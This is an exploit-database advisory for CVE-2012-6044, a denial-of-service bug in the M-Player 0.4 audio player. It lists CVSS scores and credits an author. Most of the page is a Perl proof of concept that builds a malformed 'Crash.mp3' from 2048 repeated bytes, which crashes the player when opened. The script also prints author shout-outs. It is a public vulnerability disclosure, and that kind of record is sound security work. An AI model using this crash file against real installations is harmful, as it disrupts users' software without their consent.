M-Player 0.4 Local Denial of Service Vulnerability

Published / (Updated)
Credit
Risk
2012-01-09 / 2012-11-28
JaMbA
Medium
CWE
CVE
Local
Remote
CWE-20
CVE-2012-6044
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

#!/usr/bin/perl

# Exploit Title: M-Player 0.4 Local Denial of Service Vulnerability
# Date: 08/01/2012
# Author: JaMbA
# Download:
http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/M-Player.shtml
# Version: 0.4
# Tested on: Windows 7

my $file= "Crash.mp3";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.mp3 File Created successfully\n";
print "\ I'am From Tunisia (Ahmadso best Friend)\n";
print "\ Dz-Devloper Work Team (wanted_29 Dr.Smt z4k!_xy ak27 DR.KIM
Samoray Mr_Ghost)\n";
close($FILE);

References:

http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/M-Player.shtml


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com